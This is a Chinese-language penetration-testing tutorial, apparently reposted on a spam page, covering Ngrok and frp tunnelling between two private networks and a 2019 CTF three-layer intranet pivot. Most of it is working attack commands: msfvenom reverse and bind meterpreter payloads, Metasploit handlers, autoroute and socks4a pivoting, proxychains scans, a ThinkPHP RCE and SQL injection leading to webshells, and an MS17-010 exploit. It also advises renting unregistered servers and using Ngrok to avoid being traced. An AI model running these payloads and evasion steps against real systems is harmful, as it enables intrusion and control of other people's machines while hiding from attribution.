当前位置: 首页 > news >正文

做网站专用素材专业版简历

做网站专用素材,专业版简历,来个黑黑的网站,企业自己做网站目录 必要基础知识点:1.内外网简单知识2.内网1和内网2通信问题3.正向反向协议通信连接问题4.内网穿透代理隧道技术说明 演示案例:内网穿透Ngrok测试演示-两个内网通讯上线内网穿透Frp自建跳板测试-两个内网通讯上线CFS三层内网漫游安全测试演练-某CTF线下2019 涉及资源: 主要说… 目录 必要基础知识点:1.内外网简单知识2.内网1和内网2通信问题3.正向反向协议通信连接问题4.内网穿透代理隧道技术说明 演示案例:内网穿透Ngrok测试演示-两个内网通讯上线内网穿透Frp自建跳板测试-两个内网通讯上线CFS三层内网漫游安全测试演练-某CTF线下2019 涉及资源: 主要说的是socks代理技术属于内网的穿透技术代理主要是解决内网通信的问题代理也能解决防火墙的拦截但隧道主要是安全设备、流量监控等设备上的拦截问题因为当我们去做渗透测试的时候需要回传数据或者回传敏感的东西你走的协议不一样的话在这个TCP/IP有七层协议像TCMP、SSH、HTTP的协议有些协议它会受到防火墙、过滤设备的流量检测工具、检测设备平台的干扰所以在内网经常会出现流量传输数据会回显数据、拖数据的时候会出现拦截和一些报警隧道技术主要是解决这类问题的 对方在内网我也在内网这个时候两个内网要能实现通讯的话就必须要借助代理才能实现 eathworm已经停止更新 必要基础知识点: 1.内外网简单知识 2.内网1和内网2通信问题 1这个主机在内网1里面2主机在内网2里面比如我在我的学校宿舍里面上网你在网吧上网那我们两个就都属于内网但是我们不是一个内网里面就是你是你学校内网我是网吧的内网这两个网络如果要实现通讯的话比如说我现在有个后门CS我生成一个后门然后发给你这个时候你能让对方上线到这里来这个是上不了线的因为你们都是内网除非这个时候采用代理技术 两个内网再实现通讯能够实现控制或者数据回连的时候那基本上是不可能的就是说你想用CS控制内网主机你CS也在内网它的受害主机在另一个内网不在同一个内网那么上线是不可能的因为无法控制它只会有数据的传递因为你们都连接互联网你们可以通过互联网去连接数据但是这个数据它无法准确的找到你 3.正向反向协议通信连接问题 控制端去连接被控端这种情况就是正向 被控端去连接控制端这种就是反向 你的控制端如果是服务器外网的一台主机就相当于你在外网有个唯一的IP地址通过这个IP地址能够找到你然后对方被控的肉鸡是一个内网如果你主动去找被控的内网主机的话你是找不到的因为它会有两个IP地址一个是外网IP一个是内网IP你连接外网IP就相当于你找到一个接口就好比我们通过路由器上网一样它就找到路由器那里那还怎么找到你的主机呢因为路由器下面还会有很多主机所以它写这个IP地址它只会找到路由器那里 连接内网IP地址因为这个IP地址内网都可以用到每个内网里面都会有这个IP地址就找不到因为不是唯一的所以我们主动去连接内网主机连接不上反过来是反向的话让被控制端主动过来找你就可以 4.内网穿透代理隧道技术说明 演示案例: 内网穿透Ngrok测试演示-两个内网通讯上线 1.注册-购买-填写-确认http://www.ngrok.cc/ 协议: http 本地端口:192.168.76.132:4444 2.测试: 内网1执行后门-免费主机处理-内网2监听-内网2接受器 ./sunny clientid aa0676878c162ffc msfvenom -p windows/meterpreter/reverse_http lhostxiaodisec.free.idcfengye.com lport80 -f exe -o test.exe use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.76.132 set lport 4444 exploit理论上不涉及到代理是控制不了的因为你两者都是内网你生成后门的时候你如果写你外网木马地址的话那么被控制端去连接的时候找的是你的路由器你写你内网地址更加找不到所以它就不可能去实现控制这个时候就要借助我们的Ngrok工具来实现这个连通 Ngrok会在外网提供一台服务器给你就相当于这个肉鸡去找你的时候先找你的服务器服务器在传输给你同样的我们去找被控制端也是要去找这台服务器这台服务器我和被控制端都能访问的到 服务器会在控制端这里有个客户端就相当于接收服务器给的数据所以你出去这个客户端给服务器回来也是经过客户端在给到你所以这个数据的连通就是正常的ngrok就相当于一个中介 ngrok下载地址https://www.ngrok.cc/ 免费的经常会出现掉线用的时候看你自己需要吧 你用那种协议等下木马生成就要走什么协议 我用MSF生成一个后门然后再用一台电脑执行这个后门让两个内网实现连接 运行客户端它就会寻找到我们的外网上去 确保是online状态就可以了如果不是这个状态说明你这个隧道有问题可能是我们的网络有问题要换收费的 端口要跟我们的木马保持一致 msf配置后门的监听状态设置payload就很我们生成后门的payload木马保持一致 我们把后门执行一下可以看到接收到会话了接收到的数据一直在变动 kali是控制端它在它本地运行ngrok专门监听ngrok的服务器给到它的实时端口然后木马配置的就是建立这个监听的木马所以木马就会找ngrok的服务器所以ngrok的服务器就监听到了数据就会给到本地4444所以我监听4444端口就会成功监听到木马的回连其实就是相当于中间多了个服务器就为他们的传输数据做铺垫因为他们两个内网如果单独去找对方那都找不到因为都是内网所以只能借助外网主机来帮助做这个事情就是对方要给数据的时候就到外网外网就给到下面 如果大家有什么商用、比较重要的一些建议还是要使用收费的免费的速度各方面有点小问题如果你在传输数据突然断一下很尴尬的如果不支持断点续传的话可能又要重新下载了 买的服务器也不是自己的服务器就是别人帮你提前部署好的那么对于你在测试的时候有些隐私或者小秘密怕别人知道毕竟你用的是别人的服务器工具本人可以上去偷偷看一下想要一点秘密的话可以使用frp但是使用ngrok可以避免被溯源到在红蓝对抗中这也是一个优点 内网穿透Frp自建跳板测试-两个内网通讯上线 自行搭建方便修改成本低使用多样化适合高富帅及隐私哥哥们 1.服务端-下载-解压-修改-启动 (阿云主机记得修改安全组配置出入口) 服务器修改配置文件frps.ini: [common] bind_port 6677 启动服务端 ./frps -c ./frps.ini 2.控制端-下载-解压-修改-启动 控制端修改配置文件frpc.ini: [common] server_addr 你的云主机ip server_port 6677 #frpc工作端口必须和上面frps保持一致 [msf] type tcp local_ip 127.0.0.1 local_port 5555 #转发给本机的5555 remote_port 6000 #服务端用6000端口转发给本机启动客户端 ./frpc -c ./frpc.ini msfvenom -p windows/meterpreter/reverse_tcp lhost你的公网ip lport6000 -f exe -o frp.exe msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 5555 exploit3.靶机运行frp即可 有条件尽量搞个黑服务器就是不用实名不用填一下乱七八糟的的东西可能价格会高一点那种服务器不受限制就不会存在流量各方面受控、端口上面运行一些监控 frp工具相对于ngrok工具会相对更加灵活你自己搭建的走的地址由你自己指定它就能解决两个内网的问题。比如我在自己家里面你在学校里面我想控制你都可以只需要建立跳板frp、ngrok类似工具我直接穿透你我们以前控制都还需要在外网上面搞个后门工具偷偷在上面控制控制端连接外网在上面操作的话也在外网操作 这个时候有frp之后内网的工具也能实现 有时候外网上面工具也不齐全像你自己电脑很多东西都不是齐全的这样子传输的时候也能帮你穿透内网更方便你在外网的主机上面去操作的话很麻烦的 这个技术可以利用到多项操作里面像扶一下梯子各种各样都可以 CFS三层内网漫游安全测试演练-某CTF线下2019 来源2019某CTF线下赛真题内网结合WEB攻防题库涉及WEB攻击内网代理路由等技术每台服务器存在一个Flag获取每一个ELag对应一个积分获取三个Flag结尾。 Target1: 探针目标-利用WEB漏洞(TP5 RCE)-获取webshell权限-获取FLag-Target2 1.生成后门: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.76.132 LPORT1111 -f elf t1.elf2.接受反弹 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.76.132 set LPORT 1111 exploit3.信息收集及配置访问 获取网络接口: run get_local_subnets 查看路由地址: run autoroute -p 添加路由地址: run autoroute -s 192.168.22.0/24 开启本地代理 use auxiliary/server/socks4a set srvport 2222 exploit4.利用本地代理接口访问测试 设置浏览器代理进行访问测试 linux 配置proxychains后调用工具探针Target2 /etc/proxychains.conf socks4 192.168.76.132 2222 proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80-Pn: 扫描主机检测其是否受到数据包过滤软件或防火墙的保护。 -sT: 扫描TCP数据包已建立的连接connect windows: 利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试 Target2: 探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取FLag-Target3 http://192.168.22.128/index.php?rvulkeyword1 #sql注入 http://192.168.22.128/index.php?radmini/public/login #后台 http://192.168.22.128/index.php?rspecial #后门shell 1.生成正向后门: msfvenom -p linux/x64/meterpreter/bind_tcp LPORT3333 -f elf t2.elf2.访问接受 use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp set rhost 192.168.22.128 set LPORT 3333 exploit3.信息收集及配置访问 获取网络接口: run get_local_subnets 查看路由地址: run autoroute -p 添加路由地址: run autoroute -s 192.168.33.0/24 Target3: 探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG proxychains4 nmap -Pn -sT 192.168.33.33 use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set RHOST 192.168.33.33 exploit shell dir /S flag.txt /B type xxxxx.txt我现在有个76网段然后我攻击目标1的76.148因为这个接口我能访问然后我攻击到它之后 目标3没有网络所以你正向也不行反向也不行正向连接它你没有它的网段连接不了它主动过来找你也不行因为它没有网络所以我们只能一步步渗透渗透到目标1这个服务器了通过它的网卡22.129去攻击目标2之后目标2这里是不是有33网卡这个时候我们借目标2去攻击目标3 TP5之前报过漏洞我们直接用EXP去搞它 因为能执行命令我们就可以直接写webshell到后门网站的路径下面去看一下当前路径在那里 查看下面目录的内容 写入后门2.php 利用后门工具去连接 这个时候我们要把它当作跳板我们可以借助CS、MSF进行操作因为CS上线之后即使权限不够也可以执行一些文件来加载代码 CS和MSF的会话是可以交接的不用去纠结是用cs还是msf 把.elf文件传上去执行文件 我们前期会进行一个信息收集收集来的信息其中就有一个叫网络接口信息 76网卡就是跟我们这台主机建立连接的22网卡就是连接内网的另一台主机但是我现在访问不了22网卡因为我这个kali是76网卡 添加个路由 查看路由地址 我们刚才反弹的会话就是session1就是说在session1上面多了个路由表示说我上面有22网卡添加了一个网络接口那么我就可以对22网卡进行通讯了由于是建立到session1的因为这个session1是通过目标1执行后门后反弹给我的所以session1原则上是建立在target1上面所以我增加路由能成功的原因在这里添加完之后说明我跟22这个网卡是能够通讯的 但是这个路由有个问题只能通过msf进行通讯这个路由是写到msf上面有些工具你没有路由规则那么它对22就无法访问它只能在msf会话上面进行操作所以这个时候会在本地开个代理相当于给其它人一个接口 我们访问目标2只受限于会话上面只在msf上面进行操作但msf上面要进行攻击虽然它上面有很多命令能够进行探针但是他不能攻击我们肯定是要进行常见攻击用浏览器打开、用端口扫描看的着摸得着的东西去攻击那样子才能得心应手 这个时候由于我们在上面无法用这些东西进行操作上面没有这些东西没有这些功能所以这个时候我们就开一个接口就相当于在目标1或kali上面开个接口然后让外部人去连接这个接口因为目前这个kali已经能够访问到目标2了因为kali上面已经有路由了所以我可以在上面开个接口我可以通过本机访问kali2222端口就相当于我本机就能连到目标2这里 利用本地代理接口进行端口探针有时候防火墙会影响到探针的结果 我们使用浏览器访问目标网址我们要建立代理走这个代理相当于享有这个路由和工具调用端口是一个道理 利用sql注入拿到账号密码对目录进行扫描获取后台登录网址进行登入进入后台获取flag 这个是后台后台不可能做代理就是说我还是需要拿webshell拿webshell后面才能做代理做路由可以通过后台的功能来拿webshell后台功能里面有模板模板可以修改代码直接找到对应文件写个后门到里面去 打开后门连接工具进行连接先进行代理设置让工具走socks4协议连接kali的2222端口 proxifier是全局代理工具你配置好代理之后相关的应用程序就会走这个协议 有些程序支持上面配置代理有些不支持就会有这样的一个差距不支持你就用sockscap64工具加载 我们现在是要让目标2主机上线上线到kali来生成后门的时候我们不是要写IP地址因为在目标2上面没有76网段使用目标2访问不到76网段就只能正向连接我们去连接目标2我们的控制端是在76网段这里我们现在取到了目标1的权限他有22网段而且我添加了路由我能找到目标2目标2没有我的路由他找不到我所以我只能正向连接 我生成一个后门绑定3333端口然后我再用我的kali主动连接目标2其实就是让我这台主机主动去找目标2 然后我在把木马上传到webshell上执行 开启监听状态 看一下目标2的网络环境 查看当前路由 添加路由 那会话上面就有这个路由了 接下来的操作就跟目标1一样了在开一个端口走协议socks4连接33对端口3333进行攻击因为他是windows主机我们可以使用nmap --scriptall进行扫描也可以使用nessus扫描在真实渗透测试过程中我们肯定是要对他进行一些扫描过程 利用扫描到的主机漏洞进行攻击 涉及资源: http://www.ngrok.cc/ https://gofrp.org/docs/ https://github.com/fatedier/frp/releases https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码: xiaocs图形化会比msf好看点但是命令会比msf少一些功能少一点所以我们用msf如果你熟悉cs的话可以用msf把会话反弹到CS上就是委派到CS上面去 对方能够连接你就用reverse不能就用bind 搭建好隧道之后用CS来监听也可以
http://www.zqtcl.cn/news/272678/

相关文章:

  • flash网站代做马鞍山网站建设制作公司
  • 温州网站的优化wordpress 注册邮箱验证失败
  • php网站开发实例视频教程宁波seo运营推广平台排名
  • 网络营销网站开发设计公司网站推广营销
  • 2015年做那个网站致富wordpress最新模板
  • 做网站开发平台北京广告公司有哪些
  • 郑州企业建站系统模板兰州需要做网站的公司有哪些
  • 怎样做网站卖东西 自己有货句容网络公司
  • 网站建设协议书 保密条款免费发布推广的网站
  • 网站首页外链上海网站建设联系方式
  • 陕西网站建设优化技术2023年1月热点新闻事件
  • 广东省建设银行招聘网站免费搭建个人网站
  • 知名商城网站建设公司wordpress主题 汉化
  • 网站上线做什么pc网站如何做移动适配
  • wap网站搭建北京北京网站建设
  • 放心的网站设计制作免费做logo设计的网站
  • 温州专业手机网站制作多少钱移动商城 网站建设方法方式
  • 周口网站开发wordpress
  • 如何查网站的备案号玉环在哪里做网站
  • 网站开发什么叫前端后端seo研究中心晴天
  • 邢台建筑类的建设网站代刷网站只做软件下载
  • 关于旅游的网站建设目的食品网站建设的目的
  • 开发php网站开发太湖网站建设推荐秒搜科技
  • 90设计网站怎么绑定手机号淘宝搜索排名
  • 无锡自助做网站哪些编程语言适合网站开发
  • 蒲城网站建设wzjseo北京专业推广公司
  • 阳春做网站外贸建站推广公司
  • 哪个网站的课件做的好源码之家关闭了
  • 各大网站热搜榜排名嵊州网站
  • 在哪找做网站的镇江网页设计工作室